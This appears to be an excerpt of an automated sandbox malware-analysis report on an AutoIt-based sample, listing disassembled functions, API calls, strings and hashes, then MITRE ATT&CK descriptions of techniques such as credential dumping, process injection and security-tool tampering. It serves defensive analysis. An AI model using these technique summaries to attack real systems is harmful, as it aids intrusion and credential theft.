Opcode ID: 8411779883d4a33e03e890ba4d9e2f3bfc5a47760022ac69748b316a31ca1032
Instruction ID: e975aa65536d59ddd84207fa276bf8febd4235642148fc90198882f360a1be5c
Opcode Fuzzy Hash: 8411779883d4a33e03e890ba4d9e2f3bfc5a47760022ac69748b316a31ca1032
Instruction Fuzzy Hash: 9411B6B13001086FEF629E58DCC0EBB37AAEB8D3A8F104175F99897291D6359C518760

Function 010498FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00FFD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FFD1BA
Part of subcall function 00FFD17C: GetStockObject.GDI32(00000011), ref: 00FFD1CE
Part of subcall function 00FFD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FFD1D8

GetWindowRect.USER32(00000000,?), ref: 01049968
GetSysColor.USER32(00000012), ref: 01049982

Strings

static, xrefs: 01049945

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: b7a7355c51dd29a057ba5a494f1d93783c07ec627515b3d9f400de398650d10b
Instruction ID: 80e0959edae893e6914ee2a624abde30c2e8955faa9017f85d22463cb492ce0e
Opcode Fuzzy Hash: b7a7355c51dd29a057ba5a494f1d93783c07ec627515b3d9f400de398650d10b
Instruction Fuzzy Hash: 9B112CB661020AAFDB15DFB8C885AEA7BA8FB0C354F014528F995D2250D735E851DB50

Function 01049617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 01049699
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 010496A8

Strings

edit, xrefs: 0104967D

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: e6341cde469c79a69d838af72907d976570602db78f27e56daed7e238d80590c
Instruction ID: d766d3d3ad03605d77194c46ad442184c8b1ae280ce178487b93279c59eca28e
Opcode Fuzzy Hash: e6341cde469c79a69d838af72907d976570602db78f27e56daed7e238d80590c
Instruction Fuzzy Hash: 1F116DB1510108ABEB615EA8DC84AEB3BAAEB0D37CF504334F9A5971E1C7369C50D760

Function 01025262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 010252D5
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 010252F4

Strings

0, xrefs: 010252CE

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: ac6da8b4a435b867d9155a5537fab85d3d790191b11ef84be31a6f029ea2844a
Instruction ID: e9a298d200366534df3df0b2caedd8c895bc854adac338da16d58ce6ae9ce85a
Opcode Fuzzy Hash: ac6da8b4a435b867d9155a5537fab85d3d790191b11ef84be31a6f029ea2844a
Instruction Fuzzy Hash: 2C11C172A01234ABEB61DE9CDD44BDD7BF8AB06654F044065EAC1E72D4D3B0E908CBA5

Function 01034D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 01034DF5
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 01034E1E

Strings

<local>, xrefs: 01034DE6

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: bef56d1dd3f9c2c82d2604f98f58d996e162fcbe59bba1f214711567bfacc9e4
Instruction ID: ab98335f78b7d3a89238c5a12eb4f983c64f24a2f1c25413fa04f2d130e083c7
Opcode Fuzzy Hash: bef56d1dd3f9c2c82d2604f98f58d996e162fcbe59bba1f214711567bfacc9e4
Instruction Fuzzy Hash: BC11A070605221BBDB259E65C888EFBFFACFF46655F00822AF5959A140E3B05844C6F0

Function 0103A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0103A84E
htons.WSOCK32(00000000,?,00000000), ref: 0103A88B

Strings

255.255.255.255, xrefs: 0103A866

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: htonsinet_addr
String ID: 255.255.255.255
API String ID: 3832099526-2422070025
Opcode ID: 6025c65189bfc5ac93b3227b21001e8cc77cbe434b2706842271cef35dc0827c
Instruction ID: de3862a1ae2d2ba760fc9460d4cbc681a99e76603ecdf5d731b4fdf595ba7202
Opcode Fuzzy Hash: 6025c65189bfc5ac93b3227b21001e8cc77cbe434b2706842271cef35dc0827c
Instruction Fuzzy Hash: F0010434300305EBCB209F68C885FEEB368FF84310F10845AE5919B2D0D776E8028751

Function 0101B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0101B7EF

Strings

ListBox, xrefs: 0101B7B9
ComboBox, xrefs: 0101B78B

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 2de1149e09842b052cfdc17e6d12dc02940a312eb9175c695660612bae992f69
Instruction ID: 806b6a0b503a7270ea270089a89e8cb50c8377308269a34fc7e724f30ef3d5ca
Opcode Fuzzy Hash: 2de1149e09842b052cfdc17e6d12dc02940a312eb9175c695660612bae992f69
Instruction Fuzzy Hash: 8701DF71640118AFCB04EBA8CC529FE33B9BF46350B04061EF4A2A72D5EB7C5909DBA0

Function 0101B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000180,00000000,?), ref: 0101B6EB

Strings

ListBox, xrefs: 0101B6B5
ComboBox, xrefs: 0101B687

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 6ce29ca2f6f7bcd0f28c49f8224f1bd77684835a3bd4c7bd325db17b98a89e47
Instruction ID: 4439a4fcded4102e6f8fbc76f65766970250d4e6b34f85f2be2ae7c2b9d768e9
Opcode Fuzzy Hash: 6ce29ca2f6f7bcd0f28c49f8224f1bd77684835a3bd4c7bd325db17b98a89e47
Instruction Fuzzy Hash: E401A271641004ABDB04EBA9CD62AFE73B99F19344F00001DF582B7185DB9C5E1997F5

Function 0101B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000182,?,00000000), ref: 0101B76C

Strings

ListBox, xrefs: 0101B738
ComboBox, xrefs: 0101B70A

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 051eed84a8bba59b7eb87a0ff73b5717c3e0a7fbbda35c5675935c8f51c62419
Instruction ID: 34062797214c580064388d70b9ffef02b7634ea9587db6d09a5ab82245ed8734
Opcode Fuzzy Hash: 051eed84a8bba59b7eb87a0ff73b5717c3e0a7fbbda35c5675935c8f51c62419
Instruction Fuzzy Hash: 1A01D172640104BBDB00EBA9CD12EFE73BDAB15344F04001AF582B3195DB6C5E0A97F5

Function 01027744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 01027762
_wcscmp.LIBCMT ref: 01027774

Strings

#32770, xrefs: 0102776E

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: adf9a81827059a19e4a9c529d635f5c1affd4bd7837711e840c4a4d9b4d5a6da
Instruction ID: d960b1a1064881b23b5964086e739dbfb2ff7f831378c09a61822d8730788b0d
Opcode Fuzzy Hash: adf9a81827059a19e4a9c529d635f5c1affd4bd7837711e840c4a4d9b4d5a6da
Instruction Fuzzy Hash: 00E0D87760432567DB20EAE9DC09EC7FBACFB55760F00405AF985D7141D674E60187D0

Function 0101A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0101A63F

Part of subcall function 010013F1: _doexit.LIBCMT ref: 010013FB

Strings

AutoIt, xrefs: 0101A633
Error allocating memory., xrefs: 0101A638

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: e281b3d3d16af9b1dd8a2295e574431cc571e3f9d729ed78659425066f871063
Instruction ID: c19da3e2a4c3c13d7ce744e6d28259f3c07bb8fbcdbb15852aa38786c568a329
Opcode Fuzzy Hash: e281b3d3d16af9b1dd8a2295e574431cc571e3f9d729ed78659425066f871063
Instruction Fuzzy Hash: DDD02B313C432873D32036EA2C17FD436488F18F95F080029FB8C990C18DEAC54013E8

Function 0105AE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 0105ACC0
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0105AEBD

Strings

WIN_XPe, xrefs: 0105ACD3

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: DirectoryFreeLibrarySystem
String ID: WIN_XPe
API String ID: 510247158-3257408948
Opcode ID: 208fd747baa8027d9ef9db4e1269a65a83f950764adbf34dae58d4ecbfc04f01
Instruction ID: f61abdec172f0bae6322a30ac52d05e02ceb5bcf61241d43e0537eb012c7ca1c
Opcode Fuzzy Hash: 208fd747baa8027d9ef9db4e1269a65a83f950764adbf34dae58d4ecbfc04f01
Instruction Fuzzy Hash: 8DE06D71D0050EEFDBA5DBA8D944AEDBBB8AB58300F008191E5E6B3160CB715A84DF30

Function 01048698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 010486A2
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 010486B5

Part of subcall function 01027A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 01027AD0

Strings

Shell_TrayWnd, xrefs: 0104869B

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 25539d35202bb7966643163b9ba523464de79e70c09af0e262712d7fa7ef4965
Instruction ID: bc0930cc4c99ead199464185752d2aa33b42e281ec35d88bb67d6ec6ba0d4de6
Opcode Fuzzy Hash: 25539d35202bb7966643163b9ba523464de79e70c09af0e262712d7fa7ef4965
Instruction Fuzzy Hash: 98D01235794324B7E77466B09C1BFC67A18AB58B21F100819F7C9AE1D4C9E5ED40CB54

Function 010486CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 010486E2
PostMessageW.USER32(00000000), ref: 010486E9

Part of subcall function 01027A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 01027AD0

Strings

Shell_TrayWnd, xrefs: 010486DB

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 03cc4694846665d289507f558e6e630da5968a46861ab77edec7025f4d36a85f
Instruction ID: 5a7bc167a0ce47a0df79d5e22cff5be70b1ccbedee857ab4d4d41700abc5c51c
Opcode Fuzzy Hash: 03cc4694846665d289507f558e6e630da5968a46861ab77edec7025f4d36a85f
Instruction Fuzzy Hash: FED0C9317813247BE67466B09C0BFC67A18AB58B21F500819F6C5AA1D4C9A5A9408B55

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

